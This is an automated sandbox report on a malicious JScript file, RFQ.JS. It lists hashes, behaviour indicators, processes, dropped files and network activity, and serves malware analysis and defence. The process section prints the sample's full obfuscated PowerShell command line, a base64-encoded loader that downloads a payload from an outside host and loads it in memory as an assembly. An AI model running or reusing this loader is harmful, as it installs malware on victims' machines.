File name:

RFQ.JS

Full analysis: https://app.any.run/tasks/e7913f30-ea73-4399-9e04-327351de8ec7
Verdict: Malicious activity
Analysis date: May 10, 2025, 03:16:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (308), with CRLF line terminators
MD5:

94681EF7FDBC9AB1B8B192102D8367C5

SHA1:

A0E2B34F53B948914C298F9F63968820E7006F03

SHA256:

47001FCACB51685040021AF829E8B22CFA802B19B9CD8DD60CFAD899A0BA9A73

SSDEEP:

768:osy3M5GTjIHnsy3M5GTjIHYsy3M5GTjIHnsy3M5GTjIHYsy3M5GTjIHnsy3M5GTJ:29kYSvbYGP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4120)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4120)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6404)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 6404)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6404)
    • Executes script without checking the security policy

      • powershell.exe (PID: 4120)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 6404)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 6404)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4120)
  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 4120)
      • slui.exe (PID: 1132)
    • Disables trace logs

      • powershell.exe (PID: 4120)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Reads the software policy settings

      • slui.exe (PID: 1132)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
127
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1132C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4120"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fructificative = 'JGdhbmdidXN0ZXJzID0gJ3R4dC54cGNveXBuYWkvcm9sb2MvaGNldC5yZWVyYXFhdC8vOnNwdHRoJzskcGljbGUgPSAnaHR0cHM6Ly9kb2NzLmluZm9ybWVmYWN0dXJhY2lvbmRpZ2l0YWwub25saW5lL2ZpbGUvMTYnOyRtaWNyb2xpdGhzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskbWljcm9saXRocy5IZWFkZXJzLkFkZCgnVXNlci1BZ2VudCcsJ01vemlsbGEvNS4wJyk7JHRpcHVsYSA9ICRtaWNyb2xpdGhzLkRvd25sb2FkRGF0YSgkcGljbGUpOyRhcmNoZW9sb2dpc3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkdGlwdWxhKTskY3liZXJzcGVlY2ggPSAnPDxzdWRvX3BuZz4+JzskZGlhbmRlciA9ICc8PHN1ZG9fb2R0Pj4nOyRiYW5pZSA9ICRhcmNoZW9sb2dpc3QuSW5kZXhPZigkY3liZXJzcGVlY2gpOyRzY29ybmZ1bCA9ICRhcmNoZW9sb2dpc3QuSW5kZXhPZigkZGlhbmRlcik7JGJhbmllIC1nZSAwIC1hbmQgJHNjb3JuZnVsIC1ndCAkYmFuaWU7JGJhbmllICs9ICRjeWJlcnNwZWVjaC5MZW5ndGg7JGNydW1taWVyID0gJHNjb3JuZnVsIC0gJGJhbmllOyRtaWxsaWxpdHJlcyA9ICRhcmNoZW9sb2dpc3QuU3Vic3RyaW5nKCRiYW5pZSwgJGNydW1taWVyKTskYXlvbmQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtaWxsaWxpdHJlcyk7JHNhd2hvcnNlID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYXlvbmQpOyRMYXZlcm5hID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dIEAoJGdhbmdidXN0ZXJzLCcnLCcnLCcnLCdNU0J1aWxkJywnJywnJywnJywnJywnQzpcVXNlcnNcUHVibGljJywnYWRkcmVzcycsJ2pzJywnJywnJywnZGlzcGxheWFibGUnLCcyJywnJykp' -replace '','';$deedless = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($fructificative));Invoke-Expression $deedless;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4272\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6404"C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\RFQ.JSC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
5 906
Read events
5 905
Write events
1
Delete events
0

Modification events

(PID) Process:(6404) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
DDCB100000000000
Executable files
0
Suspicious files
1
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
4120powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:879C9F33EDB68D390507615B2E909258
SHA256:87D9060E566B4311651DC61487FC8190482E987EA97915A6E47D130587939A07
4120powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kvzfzfzo.zac.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4120powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hgijbbgu.30r.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
21
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3192
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
3192
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.159.0:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
google.com
  • 142.250.186.78
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
docs.informefacturaciondigital.online
unknown
login.live.com
  • 20.190.159.0
  • 40.126.31.129
  • 40.126.31.69
  • 20.190.159.64
  • 20.190.159.68
  • 20.190.159.128
  • 40.126.31.130
  • 40.126.31.73
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted

Threats

No threats detected
No debug info